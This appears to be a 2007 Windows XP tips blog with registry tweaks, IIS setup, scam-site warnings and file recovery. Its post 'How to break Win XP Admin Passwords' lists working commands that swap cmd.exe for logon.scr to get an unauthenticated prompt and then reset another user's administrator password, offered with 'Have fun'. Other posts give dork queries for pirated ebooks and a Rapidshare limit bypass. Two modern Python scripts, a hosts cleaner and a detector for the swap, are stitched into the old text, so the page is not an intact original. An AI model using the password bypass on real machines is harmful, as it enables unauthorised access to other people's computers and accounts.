WISE WORDS:The secret of success is constancy in purpose.

List Of Sites I Recommend Not To Go To ~UPDATED~

Misspellings or misrepresentation Tactics

hxxp:// - Beware, links on the page prompt for download of star dialer.

hxxp:// - Same as Again, beware of star dialer.

hxxp:// - Same as and

hxxp:// - Fishy executable present here.

hxxp:// - Redirects to

hxxp:// - I discovered this site while reading Sharman's copyright infringement complaint to

hxxp:// - Old soulseek domain, that now links to a mainpeen dialer (scumware).

hxxp:// - WinMX based scam.

Regular P2P scam type sites

hxxp:// - Looks to me to be just a cheap plug for a product (an MP3 CD player).

hxxp:// - Not only do they link to yet another scam site, they also link to many forms of adware and spyware including gator and aluriaaffiliates.

hxxp:// - Links to an existing scam site.

hxxp:// - This one was being displayed on BeatKing through the Google ads

hxxp:// - Claims it's legal; obviously a scam.

hxxp:// - The main culprit is (

hxxp:// - Another claim of legality.

Tuesday, August 28, 2007

How To Set search For All Files In Winxp

When you perform a search for a file in Windows XP, the default setting is for XP to return ONLY files of registered types in the "Search Results" pane, that is, files whose type is registered to a program on your PC.

In other words if you are looking for a file that is NOT registered with an application on your PC, it will not be found using the default search settings.

However, you can turn off the default with a quick tweak of the registry!

Open the Registry editor (type regedit from the Run command) and navigate to:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\

Double-Click the value named:


..and change the value from 0 to 1

Exit the registry editor and reboot!!!!!

Slow Opening Of File Dialogs

An intermittent slowdown opening file dialogs or Windows Explorer listings is often caused by a mapped network drive. You can select Map Network Drive from Windows Explorer's Tools menu to make a drive or a folder on a remote PC appear as a simple drive letter on your computer. This will let you access that drive or folder as if it were a local drive. After a restart, Windows reestablishes the connection when it's needed—for example, when you open the drop-down box that displays a tree containing My Computer and all drives below it. This initial connection can sometimes be slow the first time in a session. If the remote PC is not accessible, each attempt to display the folder tree may be slowed. Most likely the reason that some of your file-open dialogs are slow and some aren't lies in their initial display mode.

If the inconvenience of this slowdown outweighs the convenience of having a mapped network drive, simply click on Tools in Windows Explorer's menu and select Disconnect Network Drive. Select the drive to disconnect and click on OK.

WISE WORDS:Coming events cast their shadows before.

Securing your WIN XP computer

Do you work in a corporate environment where you don't appreciate your co-workers or boss having access to your comp and private files when you are not around?

You can provide an added level of security to your WIN XP system. This is called securing your Win XP accounts database. You can store all information related to your accounts in an encrypted form on a floppy disk. This means that if you do not have access to your floppy disk, you cannot access the system. I am not sure you realized what I just said! Even if you know your user ID and password, you will not be able to access the system unless and until you have this startup disk.

The process of generating this secure startup floppy disk is simple. Go to START-RUN and type syskey. You will see a window come up. Click on the Upgrade command button. You will see another window pop up, which gives you the option of storing the encrypted accounts database either locally or on your floppy disk. Choose floppy disk, click OK and let the process complete. You are done.

Next time you reboot the computer and get to the login prompt, make sure that you have the floppy disk available in the A: drive, or else you cannot log in.

WISE WORDS:Better to be harmless, than harmful.

Search Google For Ebook Server

As you know, Google is the most popular search engine in the world.

Here are some tips to help you find eBooks with Google:

Find Apache's (default) Index page

Try this query:

+("index of") +("/ebooks"|"/book") +(chm|pdf|zip|rar) +apache

Find a particular eBook file:

Try this query:

allinurl: +(rar|chm|zip|pdf|tgz) hacking

WISE WORDS:Blessed are the meek, for they shall inherit the earth.

Rapidshare Timelimit

Rapidshare traces the user's IP address to limit each user to a certain amount of downloading per day. To get around this, you need to show the Rapidshare server a different IP address. You can do this in one of several ways.

Requesting a new IP address from your ISP server.

Here's how to do it in windows:
1. Click Start
2. Click run
3. In the run box type cmd.exe and click OK
4. When the command prompt opens type the following. ENTER after each new line.

ipconfig /flushdns
ipconfig /release
ipconfig /renew

5. Erase your cookies in whatever browser you are using.
6. Try the rapidshare download again.
Frequently you will be assigned a new IP address when this happens. Sometimes you will, sometimes you will not. If you are on a fixed IP address, this method will not work. To be honest, I do not know how to do this in linux/unix/etc. If this works for you, you may want to save the above commands into a batch file, and just run it when you need it.

WISE WORDS:Common sense is not so common.

Monday, August 27, 2007

Remote Shutdown

XP PRO has a lot of fun utilities. One of the most useful ones I have found to date is the ability to remotely reboot a PC. There are 2 ways of doing this. You will need to have admin access to the PC to perform these actions. That being said, here is the first way to do it:

Right click my computer, choose manage.
Highlight the Computer Management (Local) then click on Action, choose connect to another computer.
In the window that opens fill in the machine name of the PC you want to connect to and click ok.
Once connected right click on Computer Management (Remote machine name) and choose properties.
Go to the "Advanced" tab and click the Settings button under Start up and recovery.
Click on the Shutdown button.
Under action choose what you want to do (you can log off current user, shut down, restart, or power down. you can also choose if you want to force all applications to close, close hung apps, or wait for all apps to close by themselves).

The second way... Remember DOS... that good old thing. Open up a command prompt and enter the following:

%windir%\System32\shutdown.exe -r -m \\Machinename

The command has more switches and options. I highly suggest using shutdown.exe /? to see all the possibilities.

WISE WORDS:Clear statement is argument.

Recover a Corrupted System File

If an essential Windows file gets whacked by a virus or otherwise corrupted, restore it from the Windows CD. Search the CD for the filename, replacing the last character with an underscore; for example, Notepad.ex_. If it's found, open a command prompt and enter the command EXPAND, followed by the full pathname of the file and of the desired destination: EXPAND D:\SETUP\NOTEPAD.EX_ C:\Windows\NOTEPAD.EXE. If either pathname contains any spaces, surround it with double quotes.

If the file isn't found, search on the unmodified filename. It will probably be inside a CAB file, which Win XP treats as a folder. Simply right-drag and copy the file to the desired location. In other Windows platforms, search for a file matching *.cab that contains the filename. When the search is done, open a command prompt and enter EXTRACT /L followed by the desired location, the full pathname of the CAB file, and the desired filename; for example: EXTRACT /L C:\Windows D:\I386\ Notepad.exe. Again, if the destination or CAB file pathname contains spaces, surround it with double quotes.

WISE WORDS:Blessed are the merciful, for they shall obtain mercy.

Problem With Internet Navigation, Clean Host File

We have seen a large number of computers coming in with problems navigating the Internet, and also unable to reach Windows Update and virus update sites. Here is a quick fix that also seems to speed navigation up some.

Just for safety create a copy of the file before making changes.


C:\windows\system32\drivers\etc\ (Windows XP)

C:\I386 (Windows 2000)

Open the hosts file with Notepad.

Remove all entries below localhost,

then save and close.
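The same cleanup as a script, for machines where doing it by hand is error-prone; this is an added example, not part of the original post. It keeps comments and the localhost mapping, removes every other entry wherever it sits in the file (a generalisation of "below localhost"), and writes a .bak copy first. The sample content, its example.* names and all function names are constructed for illustration.

```python
import ipaddress
import shutil

LOCALHOST_ADDRESSES = {"127.0.0.1", "::1"}

# Constructed sample of a tampered hosts file (names and addresses are made up).
SAMPLE_HOSTS = (
    "# sample header comment\r\n"
    "127.0.0.1       localhost\r\n"
    "127.0.0.1       update.example.com   # update site pointed at loopback\r\n"
    "0.0.0.0 av-signatures.example.net\r\n"
    "\r\n\r\n\r\n"  # blank padding that pushes the next entry out of view
    "203.0.113.7     www.example.org shop.example.org\r\n"
)


def parse_hosts_line(line):
    """Return (address, [names]) for a mapping line, None for blank or comment lines."""
    fields = line.split("#", 1)[0].split()
    if len(fields) < 2:
        return None
    return fields[0], [name.lower() for name in fields[1:]]


def classify(address):
    """'blocked': name sent to a loopback/unspecified address; 'redirected': sent elsewhere."""
    try:
        ip = ipaddress.ip_address(address)
    except ValueError:
        return "malformed"
    return "blocked" if ip.is_loopback or ip.is_unspecified else "redirected"


def clean_hosts(text):
    """Drop every mapping except localhost; keep comments and blank lines.

    Returns (cleaned_text, removed), where removed is a list of
    (line_number, address, name, kind) tuples for the audit trail.
    """
    kept, removed = [], []
    for lineno, line in enumerate(text.splitlines(), start=1):
        entry = parse_hosts_line(line)
        if entry is None:
            kept.append(line)
            continue
        address, names = entry
        keeps_localhost = address in LOCALHOST_ADDRESSES and "localhost" in names
        if keeps_localhost:
            # Preserve the original line unless other names were tacked onto it.
            kept.append(line if names == ["localhost"] else f"{address}\tlocalhost")
        for name in names:
            if keeps_localhost and name == "localhost":
                continue
            removed.append((lineno, address, name, classify(address)))
    return "\r\n".join(kept) + "\r\n", removed


def clean_hosts_file(path):
    """Copy the hosts file to <path>.bak, rewrite it cleaned, return the removed entries."""
    with open(path, "r", encoding="latin-1", newline="") as fh:
        text = fh.read()
    shutil.copyfile(path, path + ".bak")
    cleaned, removed = clean_hosts(text)
    with open(path, "w", encoding="latin-1", newline="") as fh:
        fh.write(cleaned)
    return removed


if __name__ == "__main__":
    _, dropped = clean_hosts(SAMPLE_HOSTS)
    for lineno, address, name, kind in dropped:
        print(f"line {lineno}: {name} -> {address} ({kind})")
```

Review the removed list before discarding it: "blocked" entries for update or antivirus sites are the symptom described above, while "redirected" entries show where traffic was being sent.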

WISE WORDS:Better be three hours soon than one minute late.

Installing iis On Windows Xp Pro

If you are running Windows XP Professional on your computer you can install Microsoft's web server, Internet Information Server 5.1 (IIS) for free from the Windows XP Pro installation CD and configure it to run on your system by following the instructions below: -

1. Place the Windows XP Professional CD-Rom into your CD-Rom Drive.

2. Open 'Add/Remove Windows Components' found in 'Add/Remove Programs' in the 'Control Panel'.

3. Place a tick in the check box for 'Internet Information Services (IIS)' leaving all the default installation settings intact.

4. Once IIS is installed on your machine you can view your home page in a web browser by typing 'http://localhost' (you can substitute 'localhost' for the name of your computer) into the address bar of your web browser. If you have not placed your web site into the default directory you should now be looking at the IIS documentation.

5. If you are not sure of the name of your computer right-click on the 'My Computer' icon on your desktop, select 'Properties' from the shortcut menu, and click on the 'Computer Name' tab.

6. Your default web directory to place your web site in is 'C:\Inetpub\wwwroot', but if you don't want to overwrite the IIS documentation found in this directory you can set up your own virtual directory through the 'Internet Information Services' console.

7. The 'Internet Information Services' console can be found in the 'Administration Tools' in the 'Control Panel' under 'Performance and Maintenance', if you do not have the control panel in Classic View.

8. Double-click on the 'Internet Information Services' icon.

9. Once the 'Internet Information Services' console is open you will see any IIS web services you have running on your machine including the SMTP server and FTP server, if you chose to install them with IIS.

10. To add a new virtual directory right click on 'Default Web Site' and select 'New', followed by 'Virtual Directory', from the drop down list.

WISE WORDS:Begin, not with a programme, but with a deed.

Sunday, August 26, 2007

Performance Increase Through My Computer

1: Start > Right Click on My Computer and select properties.
2: Click on the "Advanced" tab
3: See the "Performance" section? Click "Settings"
4: Disable all or some of the following:

Fade or slide menus into view
Fade or slide ToolTips into view
Fade out menu items after clicking
Show Shadows under menus
Slide open combo boxes
Slide taskbar buttons
Use a background image for each folder type
Use common tasks in folders

There, now Windows will still look nice and perform faster!!!!!!!

WISE WORDS:Complaints are only lies in court cloths.

Ntfs Cluster Size, better harddrive performance

A cluster is an allocation unit. If you create a file of, let's say, 1 byte in size, at least one cluster is allocated on a FAT file system. On NTFS, if the file is small enough, it can be stored in the MFT record itself without using additional clusters. When a file grows beyond the cluster boundary, another cluster is allocated. This means that the bigger the cluster size, the more disk space is wasted; however, the performance is better.

So if you have a large hard drive & don't mind wasting some space, format it with a larger cluster size to gain added performance.

The following table shows the default values that Windows NT/2000/XP uses for NTFS formatting:

Drive size (logical volume)     Cluster size            Sectors
512 MB or less                  512 bytes               1
513 MB - 1,024 MB (1 GB)        1,024 bytes (1 KB)      2
1,025 MB - 2,048 MB (2 GB)      2,048 bytes (2 KB)      4
2,049 MB and larger             4,096 bytes (4 KB)      8

However, when you format the partition manually, you can specify cluster size 512 bytes, 1 KB, 2 KB, 4 KB, 8 KB, 16 KB, 32 KB, 64 KB in the format dialog box or as a parameter to the command line FORMAT utility.

The performance comes through the bursts from the hard drive. By having a larger cluster size, you effectively have a larger chunk of data sent to RAM rather than having to read multiple smaller chunks of the same data.

WISE WORDS:Charity begins at home.

Manage Saved Ie Passwords

When you enter a user name and password, Internet Explorer may ask if you want it to remember the password. Click on Yes and it will automatically fill in the password next time you enter that user name. But if you check Don't offer to remember any more passwords, then whether you click on Yes or No, you won't be prompted again. To recover this feature, launch Internet Options from IE's Tools menu, select the Content tab, click on the AutoComplete button, and check Prompt me to save passwords.

To delete an individual saved password entry, go to the log-on box on a Web page and double-click. Your saved AutoComplete entries will drop down. Use the arrow keys to scroll to the one you want to delete, and press the Del key.

WISE WORDS:Beasts leave ingratitude to man.

Remove the Links folder in IE Favorites

If you're one of the many people who NEVER use the "Links" folder in your Favorites and can't keep Windows from re-creating it, here's how:

[Start] [Run] [Regedit]

Registry Key: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar

Modify/Create the Value Data Type(s) and Value Name(s) as detailed below.

Data Type: REG_SZ [String Value] // Value Name:


Value Data: [Set the String Value to a blank string]

Open Internet Explorer and manually delete the Links folder from Favorites Menu. The Links folder will not be recreated. Exit Registry and Reboot.

WISE WORDS:Boldness is an ill-keeper of promise.

How to break Win XP Admin Passwords

This trick will only work if the person that owns the machine
has no intelligence. This is how it works:
When you or anyone installs Win XP for the first time you're
asked to put in your username and up to five others.
Now, unbeknownst to a lot of other people this is the only place in
Win XP that you can password the default Administrator Diagnostic
Account. This means that to bypass most administrators' accounts
on Win XP all you have to do is boot to safe mode by pressing F8
during boot up and choosing it. Log into the Administrator Account
and create your own or change the password on the current Account.
This only works if the user on setup specified a password for the
Administrator Account.

This has worked for me on both Win XP Home and Pro.
Now this one seems to be machine dependent; it works randomly (don't know why).

If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands exactly:
(this appeared on w* a few days ago but I found that it wouldn't work
on the welcome screen of a normal booted machine)
cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos
Now what you have just done is told the computer to back up the command program
and the screen saver file, then edited the settings so that when the machine boots the
screen saver you will get an unprotected dos prompt without logging into XP.
Once this happens, enter this command minus the quotes:
"net user password"
If the Administrator Account is called Frank and you want the password blah, enter this:
"net user Frank blah"
and this changes the password on Frank's machine to blah and you're in.
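From the defender's side, the state these steps leave behind is easy to check for: logon.scr is byte-identical to cmd.exe, cmd.exe is gone from system32, and a temphack folder holds the copies. The script below is an added example, not part of the original post; it compares every file under a directory with a trusted copy of cmd.exe, so it goes beyond logon.scr to any renamed shell. The trusted copy's location, the function names and the demo tree are assumptions constructed for illustration.

```python
import hashlib
import os
import tempfile

SHELL_NAME = "cmd.exe"


def sha256_of(path, chunk=65536):
    """Hash a file in chunks so large binaries do not need to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            digest.update(block)
    return digest.hexdigest()


def find_shell_masquerades(system_dir, trusted_shell):
    """Compare every file under system_dir with a trusted copy of the shell.

    Returns a sorted list of (kind, relative_path) tuples:
      masquerade    - shell bytes under a different file name (e.g. logon.scr)
      stray_copy    - a shell copy below the top level (e.g. a backup folder)
      shell_missing - no top-level shell matching the trusted copy was found
    """
    ref_size = os.path.getsize(trusted_shell)
    ref_hash = sha256_of(trusted_shell)
    findings = []
    top_level_shell_ok = False
    for root, _dirs, files in os.walk(system_dir):
        for name in files:
            path = os.path.join(root, name)
            try:
                # Cheap size check first; hash only candidates of equal size.
                if os.path.getsize(path) != ref_size or sha256_of(path) != ref_hash:
                    continue
            except OSError:
                continue  # unreadable file: skipped here, worth logging in real use
            rel = os.path.relpath(path, system_dir)
            if name.lower() != SHELL_NAME:
                findings.append(("masquerade", rel))
            elif os.path.dirname(rel):
                findings.append(("stray_copy", rel))
            else:
                top_level_shell_ok = True
    if not top_level_shell_ok:
        findings.append(("shell_missing", SHELL_NAME))
    return sorted(findings)


def build_demo_tree(base):
    """Constructed sample: a fake system32 in the state the steps above leave behind."""
    shell_bytes = b"MZ constructed stand-in for the command shell"
    saver_bytes = b"MZ constructed stand-in for the logon screen saver"
    trusted = os.path.join(base, "trusted", SHELL_NAME)
    system_dir = os.path.join(base, "system32")
    os.makedirs(os.path.dirname(trusted))
    os.makedirs(os.path.join(system_dir, "temphack"))
    layout = {
        trusted: shell_bytes,
        os.path.join(system_dir, "logon.scr"): shell_bytes,             # renamed shell
        os.path.join(system_dir, "temphack", "cmd.exe"): shell_bytes,    # backup copy
        os.path.join(system_dir, "temphack", "logon.scr"): saver_bytes,  # original saver
        os.path.join(system_dir, "notepad.exe"): b"MZ unrelated constructed file",
    }
    for path, data in layout.items():
        with open(path, "wb") as fh:
            fh.write(data)
    return system_dir, trusted


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        sysdir, ref = build_demo_tree(tmp)
        for kind, rel in find_shell_masquerades(sysdir, ref):
            print(f"{kind:14} {rel}")
```

Take the trusted copy from install media or a known-clean machine of the same Windows version and service pack, since the comparison is an exact byte match.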

Have fun!!!!!!!!

WISE WORDS:Age measures also experience.